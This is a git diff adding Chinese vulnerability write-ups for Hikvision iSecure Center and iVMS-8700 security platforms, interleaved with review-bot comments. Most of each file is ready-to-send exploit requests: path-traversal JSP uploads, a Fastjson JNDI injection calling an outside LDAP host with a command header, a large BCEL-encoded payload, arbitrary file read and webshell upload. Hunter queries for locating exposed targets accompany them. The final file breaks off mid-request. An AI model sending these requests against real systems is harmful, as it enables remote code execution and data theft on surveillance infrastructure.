+![1690550618393-97f7ecb5-730d-446d-9075-803c2d6de1a7.png](./img/icW1dT4mb2htBLN1/1690550618393-97f7ecb5-730d-446d-9075-803c2d6de1a7-438028.png) + +## POC1 +```plain +POST /svm/api/external/report HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_371 +Host: ip +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 172 + +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="../../../tomcat85linux64.1/webapps/els/static/1ndex.txt" + +index +--00content0boundary00-- + +``` + +![1690550672329-2a799722-e942-4433-9a33-a8dd8aa6716a.png](./img/icW1dT4mb2htBLN1/1690550672329-2a799722-e942-4433-9a33-a8dd8aa6716a-742082.png) + +上传文件位置 + +`https://ip/els/static/1ndex.txt` + +![1690550733156-055c521c-de3b-4579-a285-4fcc157d9278.png](./img/icW1dT4mb2htBLN1/1690550733156-055c521c-de3b-4579-a285-4fcc157d9278-494680.png) + +## POC2 +```plain +POST /svm/api/external/report HTTP/1.1 +Host: xx.xx.xx.xx +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a +Content-Length: 308 + +------WebKitFormBoundary9PggsiM755PLa54a +Content-Disposition: form-data; name="file"; 
filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" +Content-Type: application/zip + +<%out.print("test");%> + +------WebKitFormBoundary9PggsiM755PLa54a-- + + +``` + +![1691860141018-b168e417-ef6c-4350-b31a-145140159598.png](./img/icW1dT4mb2htBLN1/1691860141018-b168e417-ef6c-4350-b31a-145140159598-991196.png) + +上传文件位置 + +```plain +https://xx.xx.xx.xx/portal/ui/login/..;/..;/new.jsp +``` + +![1691860183109-9d6a9f3a-f571-4827-8b63-98f1240bdaa5.png](./img/icW1dT4mb2htBLN1/1691860183109-9d6a9f3a-f571-4827-8b63-98f1240bdaa5-122313.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: \ No newline at end of file diff --git a/海康威视iSecureCenter综合安防管理平台存在applyCTFastjson命令执行漏洞.md b/海康威视iSecureCenter综合安防管理平台存在applyCTFastjson命令执行漏洞.md new file mode 100644 index 0000000..a8681da --- /dev/null +++ b/海康威视iSecureCenter综合安防管理平台存在applyCTFastjson命令执行漏洞.md 
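Review bot: in POC2 of the svm file the upload `filename` ends in `.../webapps/eportal/new.jsp`, but the 上传文件位置 given afterwards is `/portal/ui/login/..;/..;/new.jsp`; the page never explains how the `eportal` webapp maps to the `/portal/` context or why the `..;/` segments are needed, so either document that mapping or show the direct URL as POC1 does with `https://ip/els/static/1ndex.txt`. The "判断是否存在该漏洞" step gives only `https://ip/svm/api/external/report` and a screenshot; state the status code or response body that distinguishes a vulnerable host so the check can be scripted and audited.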
@@ -0,0 +1,77 @@ +# 海康威视iSecure Center 综合安防管理平台存在applyCT Fastjson命令执行漏洞 + +# 1、漏洞描述 + HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。 + +# 2、影响版本 +HIKVISION iSecure Center综合安防管理平台 + +![1691858074532-d7e7b422-fc8a-427d-9b7f-894a9c84d5ab.png](./img/3xCBZzWVsmcOpFHe/1691858074532-d7e7b422-fc8a-427d-9b7f-894a9c84d5ab-663441.png) + +# 3、资产测绘 +**hunter查询语法:** + +`app.name=="Hikvision 海康威视 iSecure Center"` + +# 4、漏洞复现 +poc: + +```plain +POST /bic/ssoService/v1/applyCT HTTP/1.1 +Host: * +User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 +Content-Length: 5727 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Connection: close +Content-Type: application/json + +{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://mmmm.dns.cn","autoCommit":true},"hfe4zyyzldp":"="} +``` + +![1690419004626-3f5d2594-92fb-4d51-86de-d33904a00e90.png](./img/3xCBZzWVsmcOpFHe/1690419004626-3f5d2594-92fb-4d51-86de-d33904a00e90-440368.png) + +exp: + +出网情况下可利用JNDIExploit + +```plain +POST /bic/ssoService/v1/applyCT HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0 +Accept: text/css,*/*;q=0.1 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Content-Type:application/json +cmd:whoami +Content-Length: 215 + +{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://1.2.3.4:1389/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="} +``` + 
+![1690419116802-6e162ab9-8b94-4f6c-806f-2097f8e233e4.png](./img/3xCBZzWVsmcOpFHe/1690419116802-6e162ab9-8b94-4f6c-806f-2097f8e233e4-541729.png) + +不出网状况下通过org.apache.tomcat.dbcp.dbcp2.BasicDataSource + +```plain +POST /bic/ssoService/v1/applyCT HTTP/1.1 +Host: * +User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 +Content-Length: 5727 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Connection: close +Content-Type: application/json +Referer: * +Testcmd: whoami + +{"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$9
4$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az
_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$
aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} +``` + +![1690419352458-1d78909f-8493-410c-89ec-acc1ec64a406.png](./img/3xCBZzWVsmcOpFHe/1690419352458-1d78909f-8493-410c-89ec-acc1ec64a406-127490.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视iVMS-8700综合安防管理平台download任意文件下载.md b/海康威视iVMS-8700综合安防管理平台download任意文件下载.md new file mode 100644 index 0000000..1c17c01 --- /dev/null +++ b/海康威视iVMS-8700综合安防管理平台download任意文件下载.md @@ -0,0 +1,32 @@ +# 海康威视 iVMS-8700综合安防管理平台 download 任意文件下载 + +# 一、漏洞简介 +HIKVISION iVMS-8700综合安防管理平台存在任意文件读取漏洞,攻击者通过发送特定的请求包可以读取服务器中的敏感文件获取服务器信息 + +# 二、影响版本 ++ HIKVISION iVMS-8700综合安防管理平台 + +# 三、资产测绘 ++ hunter:`app.name=="Hikvision 海康威视 iVMS"` + +![1691846011747-3e390938-652e-4fe6-b38a-508a0b3213c5.png](./img/rCOOTOGt_2fSkyU3/1691846011747-3e390938-652e-4fe6-b38a-508a0b3213c5-829726.png) + ++ 登录页面 + +![1691846029356-5d70967f-a564-438d-9b21-de08e829d5aa.png](./img/rCOOTOGt_2fSkyU3/1691846029356-5d70967f-a564-438d-9b21-de08e829d5aa-705897.png) + +# 四、漏洞复现 +poc,token为`url+secretKeyIbuilding`进行MD5加密(**32位大写**) + +```plain +/eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1 +``` + +![1691846212487-b9d3a53e-febe-4ceb-9974-87fbbf347f48.png](./img/rCOOTOGt_2fSkyU3/1691846212487-b9d3a53e-febe-4ceb-9974-87fbbf347f48-196042.png) + +![1691846233174-cb5861b5-fd91-4610-9d18-dc62ca069f13.png](./img/rCOOTOGt_2fSkyU3/1691846233174-cb5861b5-fd91-4610-9d18-dc62ca069f13-057686.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视iVMS-8700综合安防管理平台getAllUserInfo存在信息泄露漏洞.md b/海康威视iVMS-8700综合安防管理平台getAllUserInfo存在信息泄露漏洞.md new file mode 100644 index 0000000..14902ff --- /dev/null 
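Review bot: the applyCT file says the platform has a Fastjson remote command execution flaw but gives no fastjson version, no fixed platform version and no mitigation; add the affected-version data and state that the fix is the vendor patch or disabling fastjson autoType, which the `@type` keys in every request here depend on. For defenders, the poc and exp variants make the server open an outbound LDAP connection to `ldap://mmmm.dns.cn` / `ldap://1.2.3.4:1389/Basic/TomcatEcho`, so unexpected egress LDAP from the platform host is the observable, and the 不出网 variant is the same `$$BCEL$$` blob already committed in the ssoService file; reference that one copy instead of duplicating it.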
+++ b/海康威视iVMS-8700综合安防管理平台getAllUserInfo存在信息泄露漏洞.md @@ -0,0 +1,58 @@ +# 海康威视iVMS-8700综合安防管理平台 getAllUserInfo存在信息泄露漏洞 + +# 一、漏洞简介 + 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。海康威视iVMS-8700综合安防管理平台 getAllUserInfo存在信息泄露漏洞 + +# 二、影响版本 ++ 海康威视综合安防系统iVMS-5000 ++ 海康威视综合安防系统 iVMS-8700 + +# 三、资产测绘 ++ hunter:`web.body="/views/home/file/installPackage.rar"` + +![1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png](./img/KoSL1wq2hJloS7zP/1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0-838045.png) + ++ 登录页面: + +![1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png](./img/KoSL1wq2hJloS7zP/1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111-173197.png) + +# 四、漏洞复现 +```plain +POST /services/IWsBaseService.IWsBaseServiceHttpSoap11Endpoint HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 +Content-Length: 569 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 +Authorization: Basic YWRtaW46MTIzNDU2 +Connection: close +Connection: close + + + + + + + + 1 + + 1 + + + + + + +``` + +![1702650308771-920c2278-18dd-4f17-bc87-8b5a182f4e16.png](./img/KoSL1wq2hJloS7zP/1702650308771-920c2278-18dd-4f17-bc87-8b5a182f4e16-663215.png) + +nuclei脚本: + +[海康威视-ivms-8700-信息泄露.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222237212-7f41ac18-a5a1-46d6-aa2e-960b2d07f2fd.yaml) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file diff --git a/海康威视iVMS-8700综合安防管理平台getPic任意文件上传.md b/海康威视iVMS-8700综合安防管理平台getPic任意文件上传.md new file mode 100644 index 0000000..458240f Binary files /dev/null and b/海康威视iVMS-8700综合安防管理平台getPic任意文件上传.md differ diff --git a/海康威视iVMS-8700综合安防管理平台query存在硬编码漏洞.md b/海康威视iVMS-8700综合安防管理平台query存在硬编码漏洞.md new file mode 100644 index 0000000..f23d56d 
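Review bot: the SOAP body in the getAllUserInfo file has lost its XML: only two `1` values remain between blank lines while `Content-Length: 569` shows the original envelope was much larger, so the request as committed cannot be reproduced; restore the envelope. The request also sends `Authorization: Basic YWRtaW46MTIzNDU2`, which decodes to the default credentials `admin:123456`, a precondition the 漏洞简介 never mentions; state it, because it changes the finding from unauthenticated disclosure to default-credential exposure and changes the mitigation (rotate the account). `Connection: close` is also listed twice.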
--- /dev/null +++ b/海康威视iVMS-8700综合安防管理平台query存在硬编码漏洞.md @@ -0,0 +1,41 @@ +# 海康威视iVMS-8700综合安防管理平台 query存在硬编码漏洞 + +# 一、漏洞简介 + 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。海康威视iVMS-8700综合安防管理平台 query存在硬编码漏洞。 + +# 二、影响版本 ++ 海康威视综合安防系统iVMS-5000 ++ 海康威视综合安防系统 iVMS-8700 + +# 三、资产测绘 ++ hunter:`web.body="/views/home/file/installPackage.rar"` + +![1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png](./img/5yqB1RcwhpNKCqwa/1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0-062927.png) + ++ 登录页面: + +![1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png](./img/5yqB1RcwhpNKCqwa/1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111-896124.png) + +# 四、漏洞复现 +```java +GET /gisplatform/hikgis/query.html HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +DNT: 1 +Connection: close +Upgrade-Insecure-Requests: 1 +Pragma: no-cache +Cache-Control: no-cache +``` + +![1711372755485-c9d6f5bd-773e-4956-978f-26fa8800d026.png](./img/5yqB1RcwhpNKCqwa/1711372755485-c9d6f5bd-773e-4956-978f-26fa8800d026-512825.png) + + + + + +> 更新: 2024-06-01 11:04:36 +> 原文: \ No newline at end of file diff --git a/海康威视iVMS-8700综合安防管理平台upload.action任意文件上传.md b/海康威视iVMS-8700综合安防管理平台upload.action任意文件上传.md new file mode 100644 index 0000000..822e0f2 --- /dev/null +++ b/海康威视iVMS-8700综合安防管理平台upload.action任意文件上传.md 
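Review bot: the query file's title and summary say 硬编码漏洞, but the text never says what is hard-coded or what `GET /gisplatform/hikgis/query.html` returns; the only evidence is a screenshot. Add one sentence naming the kind of value exposed (credential, key or connection string, with the value itself redacted), whether the page is reachable without login, and the fixed version.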
@@ -0,0 +1,55 @@ +# 海康威视iVMS-8700综合安防管理平台 upload.action 任意文件上传 + +# 一、漏洞简介 + 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞,攻击者通过发送特定的请求包可以上传Webshell文件控制服务器。 + +# 二、影响版本 ++ 海康威视综合安防系统iVMS-5000 ++ 海康威视综合安防系统 iVMS-8700 + +# 三、资产测绘 ++ hunter:`web.body="/views/home/file/installPackage.rar"` + +![1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png](./img/bWyBo5fSbGoz212v/1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0-912698.png) + ++ 登录页面: + +![1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png](./img/bWyBo5fSbGoz212v/1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111-920145.png) + +# 四、漏洞复现 +```plain +POST /eps/resourceOperations/upload.action HTTP/1.1 +Host: xx.xx.xx.xx +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: MicroMessenger +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: ISMS_8700_Sessionname=CA0F207A6372FE883ACA78B74E6DC953; CAS-USERNAME=058; ISMS_8700_Sessionname=4D808BE7BE0E5C7047B9688E6009F710 +Connection: close +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj +Content-Length: 212 + +------WebKitFormBoundaryTJyhtTNqdMNLZLhj +Content-Disposition: form-data; name="fileUploader";filename="test.jsp" +Content-Type: image/jpeg + +<%out.print("hello");%> +------WebKitFormBoundaryTJyhtTNqdMNLZLhj-- +``` + +![1700226259831-01874e31-0fdb-4719-bd14-5f1e64019ea0.png](./img/bWyBo5fSbGoz212v/1700226259831-01874e31-0fdb-4719-bd14-5f1e64019ea0-358413.png) + +根据响应拼接上传文件地址 + +```plain +/eps/upload/ebaae9074e254f829c8de29bb5cfcb1c.jsp +``` + +![1700226291441-59c6dd72-c5c0-42be-9f28-e8861a960b9f.png](./img/bWyBo5fSbGoz212v/1700226291441-59c6dd72-c5c0-42be-9f28-e8861a960b9f-371534.png) + + + +> 更新: 2024-02-29 23:57:17 +> 原文: \ No newline at end of file 
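Review bot: the upload.action request carries `Cookie: ISMS_8700_Sessionname=...; CAS-USERNAME=058; ISMS_8700_Sessionname=...` (the same cookie name twice) but the page does not say whether the upload succeeds without a valid session; if it is pre-auth, drop the captured cookie so the PoC does not imply a requirement, and if it is not, state the authentication precondition since that is the main mitigating factor. The returned path `/eps/upload/ebaae9074e254f829c8de29bb5cfcb1c.jsp` is one run's UUID; mark it as an example value the way the resourceOperations file does with `resourceUuid的值`.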
diff --git a/海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞.md b/海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞.md new file mode 100644 index 0000000..c4ea646 --- /dev/null +++ b/海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞.md 
@@ -0,0 +1,82 @@ +# 海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞 + +# 一、漏洞简介 + 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。 + +# 二、影响版本 ++ 海康威视综合安防系统iVMS-5000 ++ 海康威视综合安防系统 iVMS-8700 + +# 三、资产测绘 ++ hunter:`web.body="/views/home/file/installPackage.rar"` + +![1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png](./img/kDLBwyHdk2d3W6A_/1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0-110733.png) + ++ 登录页面: + +![1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png](./img/kDLBwyHdk2d3W6A_/1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111-046363.png) + +# 四、漏洞复现 +1. 访问`/eps/api/resourceOperations/upload`,发现token需要进行鉴权 + +```plain +POST /eps/api/resourceOperations/upload HTTP/1.1 +Host: xx.xx.xx.xx +Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 